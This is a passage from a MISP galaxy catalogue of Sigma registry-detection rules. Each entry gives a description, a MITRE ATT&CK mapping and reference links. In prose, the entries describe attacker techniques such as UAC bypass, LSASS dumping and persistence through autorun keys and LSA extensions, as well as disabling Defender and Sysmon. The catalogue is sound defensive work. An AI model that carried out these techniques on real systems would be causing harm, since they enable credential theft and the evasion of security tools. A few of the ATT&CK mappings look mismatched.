The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Mpnotify"

Table 9444. Table References

Links

https://persistence-info.github.io/Data/mpnotify.html

https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentControlSet Autorun Keys Modification"

CurrentControlSet Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9445. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml

Potential EventLog File Location Tampering

Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting

The tag is: misp-galaxy:sigma-rules="Potential EventLog File Location Tampering"

Potential EventLog File Location Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9446. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml

Add Debugger Entry To AeDebug For Persistence

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes

The tag is: misp-galaxy:sigma-rules="Add Debugger Entry To AeDebug For Persistence"

Table 9447. Table References

Links

https://persistence-info.github.io/Data/aedebug.html

https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml

Suspicious Application Allowed Through Exploit Guard

Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings

The tag is: misp-galaxy:sigma-rules="Suspicious Application Allowed Through Exploit Guard"

Suspicious Application Allowed Through Exploit Guard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9448. Table References

Links

https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml

System Scripts Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="System Scripts Autorun Keys Modification"

System Scripts Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9449. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml

RestrictedAdminMode Registry Value Tampering

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise

The tag is: misp-galaxy:sigma-rules="RestrictedAdminMode Registry Value Tampering"

RestrictedAdminMode Registry Value Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9450. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md

https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via AppCompat RegisterAppRestart Layer"

Potential Persistence Via AppCompat RegisterAppRestart Layer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9451. Table References

Links

https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml

Lsass Full Dump Request Via DumpType Registry Settings

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

The tag is: misp-galaxy:sigma-rules="Lsass Full Dump Request Via DumpType Registry Settings"

Lsass Full Dump Request Via DumpType Registry Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9452. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml

DHCP Callout DLL Installation

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

The tag is: misp-galaxy:sigma-rules="DHCP Callout DLL Installation"

DHCP Callout DLL Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9453. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml

Microsoft Office Protected View Disabled

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

The tag is: misp-galaxy:sigma-rules="Microsoft Office Protected View Disabled"

Microsoft Office Protected View Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9454. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview

https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml

Potentially Suspicious Desktop Background Change Via Registry

Detects regsitry value settings that would replace the user’s desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Desktop Background Change Via Registry"

Potentially Suspicious Desktop Background Change Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9455. Table References

Links

https://www.attackiq.com/2023/09/20/emulating-rhysida/

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper

https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml

Hiding User Account Via SpecialAccounts Registry Key

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.

The tag is: misp-galaxy:sigma-rules="Hiding User Account Via SpecialAccounts Registry Key"

Hiding User Account Via SpecialAccounts Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 9456. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml

Potential Persistence Via Shim Database Modification

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Shim Database Modification"

Potential Persistence Via Shim Database Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9457. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml

Bypass UAC Using DelegateExecute

Bypasses User Account Control using a fileless method

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using DelegateExecute"

Bypass UAC Using DelegateExecute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9458. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand

https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml

Modification of IE Registry Settings

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence

The tag is: misp-galaxy:sigma-rules="Modification of IE Registry Settings"

Modification of IE Registry Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9459. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml

PowerShell as a Service in Registry

Detects that a powershell code is written to the registry as a service.

The tag is: misp-galaxy:sigma-rules="PowerShell as a Service in Registry"

PowerShell as a Service in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9460. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml

Enabling COR Profiler Environment Variables

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

The tag is: misp-galaxy:sigma-rules="Enabling COR Profiler Environment Variables"

Enabling COR Profiler Environment Variables has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"

Table 9461. Table References

Links

https://twitter.com/jamieantisocial/status/1304520651248668673

https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling

https://www.sans.org/cyber-security-summit/archives

https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml

Suspicious Printer Driver Empty Manufacturer

Detects a suspicious printer driver installation with an empty Manufacturer value

The tag is: misp-galaxy:sigma-rules="Suspicious Printer Driver Empty Manufacturer"

Suspicious Printer Driver Empty Manufacturer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 9462. Table References

Links

https://twitter.com/SBousseaden/status/1410545674773467140

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml

Set TimeProviders DllName

Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

The tag is: misp-galaxy:sigma-rules="Set TimeProviders DllName"

Set TimeProviders DllName has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Time Providers - T1547.003" with estimative-language:likelihood-probability="almost-certain"

Table 9463. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml

Uncommon Extension In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

The tag is: misp-galaxy:sigma-rules="Uncommon Extension In Keyboard Layout IME File Registry Value"

Uncommon Extension In Keyboard Layout IME File Registry Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9464. Table References

Links

https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml

Suspicious Environment Variable Has Been Registered

Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings

The tag is: misp-galaxy:sigma-rules="Suspicious Environment Variable Has Been Registered"

Table 9465. Table References

Links

https://infosec.exchange/@sbousseaden/109542254124022664

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml

Change User Account Associated with the FAX Service

Detect change of the user account associated with the FAX service to avoid the escalation problem.

The tag is: misp-galaxy:sigma-rules="Change User Account Associated with the FAX Service"

Change User Account Associated with the FAX Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9466. Table References

Links

https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf

https://twitter.com/dottor_morte/status/1544652325570191361

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml

Disable Administrative Share Creation at Startup

Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

The tag is: misp-galaxy:sigma-rules="Disable Administrative Share Creation at Startup"

Disable Administrative Share Creation at Startup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 9467. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml

Suspicious Shim Database Patching Activity

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

The tag is: misp-galaxy:sigma-rules="Suspicious Shim Database Patching Activity"

Suspicious Shim Database Patching Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9468. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml

Outlook Security Settings Updated - Registry

Detects changes to the registry values related to outlook security settings

The tag is: misp-galaxy:sigma-rules="Outlook Security Settings Updated - Registry"

Outlook Security Settings Updated - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9469. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md

https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml

New Netsh Helper DLL Registered From A Suspicious Location

Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

The tag is: misp-galaxy:sigma-rules="New Netsh Helper DLL Registered From A Suspicious Location"

New Netsh Helper DLL Registered From A Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 9470. Table References

Links

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml

Disable Exploit Guard Network Protection on Windows Defender

Detects disabling Windows Defender Exploit Guard Network Protection

The tag is: misp-galaxy:sigma-rules="Disable Exploit Guard Network Protection on Windows Defender"

Disable Exploit Guard Network Protection on Windows Defender has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9471. Table References

Links

https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml

Office Macros Auto-Enabled

Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.

The tag is: misp-galaxy:sigma-rules="Office Macros Auto-Enabled"

Office Macros Auto-Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9472. Table References

Links

https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml

Potential Persistence Via LSA Extensions

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via LSA Extensions"

Table 9473. Table References

Links

https://persistence-info.github.io/Data/lsaaextension.html

https://twitter.com/0gtweet/status/1476286368385019906

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml

Bypass UAC Using Event Viewer

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using Event Viewer"

Bypass UAC Using Event Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9474. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml

Suspicious New Printer Ports in Registry (CVE-2020-1048)

Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048

The tag is: misp-galaxy:sigma-rules="Suspicious New Printer Ports in Registry (CVE-2020-1048)"

Suspicious New Printer Ports in Registry (CVE-2020-1048) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9475. Table References

Links

https://windows-internals.com/printdemon-cve-2020-1048/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml

Enable Microsoft Dynamic Data Exchange

Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.

The tag is: misp-galaxy:sigma-rules="Enable Microsoft Dynamic Data Exchange"

Enable Microsoft Dynamic Data Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

Table 9476. Table References

Links

https://msrc.microsoft.com/update-guide/vulnerability/ADV170021

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml

New Application in AppCompat

A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.

The tag is: misp-galaxy:sigma-rules="New Application in AppCompat"

New Application in AppCompat has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 9477. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md

https://github.com/OTRF/detection-hackathon-apt29/issues/1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml

Windows Defender Service Disabled

Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry

The tag is: misp-galaxy:sigma-rules="Windows Defender Service Disabled"

Windows Defender Service Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9478. Table References

Links

https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml

ScreenSaver Registry Key Set

Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl

The tag is: misp-galaxy:sigma-rules="ScreenSaver Registry Key Set"

ScreenSaver Registry Key Set has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 9479. Table References

Links

https://twitter.com/VakninHai/status/1517027824984547329

https://twitter.com/pabraeken/status/998627081360695297

https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml

Hypervisor Enforced Code Integrity Disabled

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel

The tag is: misp-galaxy:sigma-rules="Hypervisor Enforced Code Integrity Disabled"

Hypervisor Enforced Code Integrity Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9480. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci

https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml

Potential Persistence Via Outlook Today Pages

Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Today Pages"

Potential Persistence Via Outlook Today Pages has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9481. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml

Potential Persistence Via AutodialDLL

Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via AutodialDLL"

Table 9482. Table References

Links

https://persistence-info.github.io/Data/autodialdll.html

https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml

Modify User Shell Folders Startup Value

Detect modification of the startup key to a path where a payload could be stored to be launched during startup

The tag is: misp-galaxy:sigma-rules="Modify User Shell Folders Startup Value"

Modify User Shell Folders Startup Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9483. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml

Disable Sysmon Event Logging Via Registry

Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

The tag is: misp-galaxy:sigma-rules="Disable Sysmon Event Logging Via Registry"

Disable Sysmon Event Logging Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9484. Table References

Links

https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650

https://youtu.be/zSihR3lTf7g

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml

CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentVersion Autorun Keys Modification"

CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9485. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

